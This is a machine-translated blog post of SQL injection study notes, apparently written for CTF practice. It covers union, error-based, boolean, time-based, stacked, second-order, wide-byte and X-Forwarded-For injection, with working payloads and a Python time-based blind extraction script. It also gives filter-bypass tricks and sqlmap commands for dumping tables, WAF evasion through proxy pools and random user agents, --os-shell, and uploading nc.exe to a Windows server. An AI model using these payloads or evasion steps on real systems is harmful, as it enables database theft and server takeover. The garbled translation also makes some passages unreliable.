当前位置:网站首页>Web vulnerability - SQL

Web vulnerability - SQL

2021-09-15 05:07:51 1_ Ry

Because my blog is only done when I learn penetration , Nothing about it WEB Notes on vulnerabilities , Now find WEB I'm not familiar with the loopholes at the level , Write notes and review , From sql Let's start

If you don't say much, first go to the table written by the boss [ctfhub]SQL Inject - h3zh1 - Blog Garden (cnblogs.com), The basic common manual injection commands are here

union select The joint query , Joint injection is commonly used
database() Echo the currently connected database
version() View the current sql The version of :mysql 1.2.3, mariadb-4.5.6
group_concat() Use the values in the generated same group with , Connect , Form a string
information_schema Saved a lot mysql Database of information
information_schema.schemata information_schema A table of the library , be known as schemata
schema_name schemata Table storage mysql All database name fields
information_schema.tables Save mysql All the watches
table_schema tables The database name field corresponding to each table is stored in the table
table_name The name of the table and table_schema One-to-one correspondence
information_schema.columns columns The table stores the information of all columns 4
column_name When you know the name of a watch , All field names in the table can be obtained through secondary fields ( Name )
table_name The name of the table and column_name One-to-one correspondence
select updatexml(1,concat(0x7e,database(),0x7e),1); Note here , Only in databse() Correct the content you want, and then the error will be echoed
right(str, num) The string is intercepted from the right num Characters
left(str,num) Empathy : The string is intercepted from the left num Characters
substr(str,N,M) character string , From N Character start , Intercept M Characters

 

SQL Principle of injection

SQL The generation of injection leakage needs to meet the following two conditions

  • User controlled parameters : The parameters passed from the front end to the back end can be controlled by the user .
  • Parameters are brought into the data car for query : The incoming parameters are spliced into SQL sentence , And brought into the data car for query

When incoming D Parameter is and1=1 when , Executive SQL sentence .(# The symbol indicates the comment character )

select from users where id=1 and 1=1#

because 1=1 It's true , And wherei In the sentence id=1 It's true , So the page will return with id=1 Same result . When incoming ID Parameter is and1=2 when , because 1=2 Don't set up , So return false , The page will return to id=1 Different results

Through this short statement, you can preliminarily judge whether the parameter exists SQL Inject holes , If it is verified that an attacker can further splice SQL Statement to attack , Cause the database to leak , Even get server permissions

  

Union Injection attack

After judging the injection point , Use order by Determine the number of fields in the data table

For example, enter this , Echoed and id=1 The same result

id=1 order by 4#

  but order by 5 Then different results were echoed , Then the number of fields is 4

After judging the number of fields, use union Inject , Determine the location of the echo field

Use union Note that the injection parameter is set to -1, Otherwise, the database will query the parameter values first , Unable to determine echo position

id=-1 union select 1,2,3,4#

  Then enter the attack code in the echoed field , for example 2 Is the echo word segment , Input database() You can view the database

id=-1 union select 1,database(),3,4#

  Suppose you know that the database name is sqli, After knowing the database name , The query table name ,group_concat The function uses the values in the same group generated by , Connect , Form a string

id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema="sqli",3,4#

Suppose you know that the table name is flag, Query field name

id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_name="flag",3,4#

  Know the field name and check the field

id=-1 union select 1,group_concat(flag) from sqli.flag,3,4#

  This is the basic union Injection idea , But in actual combat, there will be many filters to prevent attackers from obtaining database information   

  

Error injection attack

Error reporting injection can be performed after determining the injection point , But there are no echo fields , Use only when an error message is displayed

The key command is select updatexml(1,concat(0x7e,database(),0x7e),1);  stay database() Modify the statement you want to attack at

among 0x7e yes ASCII code , intend ~, It is used to distinguish between system error and key information

Next thoughts and union Inject the same , But one thing to note is that you need to use right Functions and left Function to query the fields echoed with errors , Because the number of fields echoed by error is usually limited , The database information required is relatively long  

right(str, num) The string is intercepted from the right num Characters
left(str,num) Empathy : The string is intercepted from the left num Characters

Usage examples

-1 union select updatexml(1,concat(0x7e,right( 
(select(group_concat(schema_name))from information_schema.schemata)
,31 ),0x7e),1); #

  

Boolean Injection attack

When the page only displays yes or no, Without returning any data in the database , Just use Boolean Injection attack

use first Lenth() Function to determine the length of the database name

id=1 and lenth(database())>=1#

  After querying the length of the database name , Use substr Function to get the database name word by word , The range of database names is generally a~z、0~9 within , There may also be some special characters

substr(str,N,M)  character string , From N Character start , Intercept M Characters

id=1 and substr(database(),1,1)='a'#

  But generally, this method is slow and inefficient , Blasting is generally used , have access to bp Blasting , Use the returned byte length to determine whether it is correct

After the database name is exposed, the following methods are the same

 

Time injection attack

Time injection and Boolean Almost injection , The difference is that time injection is used to return nothing , Don't even return if it's correct .

Time injection utilization sleep Function let MySQL The execution time becomes longer to judge whether the injection is successful

The statement to judge the length of the database is

id=if(length(database())>1,sleep(5),1)

This means that if the length of the database name is greater than 1, Then pause for five seconds and execute , Otherwise, execute directly

After understanding the blind injection of time, you can attack with the starting idea

id=if(substr(database(),1,1)='a',sleep(5),1)

But time blind injection is better than manual injection Boolean Injection is slower , It's usually used python Script to implement blasting

Post the code

import requests import time headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" } word1 = [] word2 = [] # url = input("url:") # t = input("sleep:")

for i in range(65, 91): word1.append(chr(i)) for i in range(97, 123): word1.append(chr(i)) for i in range(48, 58): word1.append(chr(i)) word1.append('{') word1.append('}') for i in range(97, 123): word2.append(chr(i)) for i in range(48, 58): word2.append(chr(i)) word2.append('{') word2.append('}') for i in range(1, 40): for j in word2: url = "http://URL/?id=1 and if(substr((select flag from sqli.flag)," + str(i) + ",1)='" + str(j) + "',sleep(3),1)#" t1 = time.time() r = requests.get(url, headers) # send out GET request .  return Response object . t2 = time.time() if t2 - t1 > 3: print(j) 

 

Stack injection attack

Stacked queries can execute multiple statements , Each statement is separated by a semicolon . Stack Injection and union The difference between injection is , Stack injection can execute any statement , and union Injection is limited to query statements

For example, you can add or delete data to a database

id=1;insert into user(id,username,password)values('5','zhangsan','123456');#

  

Secondary injection attack

Second injection is that the attacker stores the attack code in the database through registration or other methods , When the database calls this attack code again , Will be attacked .

For example, the database itself has a admin Account but don't know its password , When we register an account named admin’# Construct a closed , Then change the password , The statement of the original database is

Update user set password=’New password‘ where username=‘admin‘#’ and password=’password‘

because admin There is #, The following statements will not execute , So the database will admin Change your password to the one we just changed

  

Wide byte injection attack

Wide byte injection is generally used when closed ‘/’ escape , In general, there is no SQL It's a bug injection . But there is an exception when the database code is GBK When .

’/‘ The code of is %5c,GBK and %df5c It's a traditional character with , So you can add... Before the escaped character %df The escape

 

XFF Injection attack

adopt BurpSuite Grab data , You can see HTTP There is a header parameter in the request header X- Forwarded-for.X- Forwarded-For abbreviation XF head , It represents the real... Of the client IP, By modifying the X- Forwarded-for The value of can be forged IP, take X- Forwarded-for Set to 127.0.0.1, And then visit URL, The page returns to normal

Use Union The injection method completes the injection

X-forwarded-for: 127.0.0.1' union select 1,2,3,4#

  

SQL Injection bypass technology

There are too many ways to bypass , The application scenarios of each method are also different , Don't talk about it carefully here , List common methods

  1. Case around : Commonly used for keyword filtering , because mysql Statement does not require case , You can use case to bypass
  2. Double writing bypasses : Commonly used for keyword filtering , for example and Filtered , It can be written. anandd
  3. Code bypass : Commonly used for keyword filtering , Use the filtered keywords URL Code twice , Because the server will automatically resolve it once
  4. Space around : Spaces are filtered , Use /**/ Instead of spaces
  5. Inline comments bypass : Commonly used for keyword filtering , Use /*! and*/ Put keywords and Wrap around

When using manual injection, a variety of bypass methods can be combined , The probability of success is greater .

 

Automation tools sqlmap Introduction of usage

sqlmap It's about sql Automated tools for injecting vulnerabilities

sqlmap -h view help

 

 

 

sqlmap Basics

GET The ginseng

Read the current database version

sqlmap -u http://URL/?id=1 –current-user –current-db

Detect whether there are injection points

sqlmap -u http://URL/?id=1

  Take the library name

sqlmap -u http://URL/?id=1 --dbs

  Suppose you get the library name sqli, Take the watch name

sqlmap -u http://URL/?id=1 -D sqli --tables

Suppose you get the table name user, Take your name

sqlmap -u http://URL/?id=1 -D sqli -T user --columns

Suppose you get the column name user,password, Take the field

sqlmap -u http://URL/?id=1 -D sqli -T user -C user,password --dump

POST The ginseng

When the data submission method is post When , Use bp Grab the bag , Save the text test.txt,(test.txt If you don't put it in sqlmap The directory uses an absolute path ).

sqlmap -r test.txt -p id //-r Parameter open file ,-p Parameters for parameter injection .

  The rest is just like GET In the same way

 

sqlmap Advanced

Here we mainly talk about how to bypass WAF

  • --level=5: Detection level ,1-5, The default is 1, The higher the rank ,payload The more , The slower the speed .HTTP cookei stay level by 2 It will be tested when ,HTTP User-Agent/Referer stay level by 3 It will be tested when .
  • --risk=RISK The risk of performing the test (0-3, The default is 1) 
  • –threads    # Using multithreading (–threads 3)
  • --referer“http://www.google.com”  // Simulation source , Which page did you jump from . If you don't understand, you can Google referer
  • --cookie=COOKIE: Set up http Requested cookie,level2 when , Will try to cookie Inject ,eg:"PHPSESSID=aaaa"
  • --user-agent: modify http In the request user-agent, It is usually modified to search engine UA Head to simulate search engine , Prevent sealing ip, You can also use --random-agent Parameters , Randomly from user-agent.txt In order to get .(level 3 Will try to user-agent Inject )

  • --proxy=PROXY: Connect to the target through a proxy server url
  • --delay=times : Delay Injection , Seconds per unit , Avoid attracting firewall attention

Of course, the simplest and most brutal way is to bypass the proxy pool , Go online to buy agents ( There are also free ones, but they are not easy to use ), Set up --porxy= agent ip, Change one every time you request ip, The firewall will not detect

 

 

sqlmap senior

  • --id-dba: Whether the current user has administrative rights
  • --roles: List database administrator roles , Only applicable to the current database is Oracle When
  • --referer=https://www.baid.com :sqlmap Can be forged in the request HTTP Medium referer, When –level Parameter set to 3 perhaps 3 At the above time, I will try to referer Inject
  • --sql-shell: Run custom sql sentence
  • --os-cmd,--os-shell: Run any operating system command
  • --file-read "C:/example.exe": Read files from database server
  • sqlmap.py -u URL –file-write ”/software/nc.exe” –file-dest “C:/WINDOWS/Temp/nc.exe” Upload files to database server

  

  

 

 

 

  

版权声明
本文为[1_ Ry]所创,转载请带上原文链接,感谢
https://chowdera.com/2021/09/20210909115108164v.html

随机推荐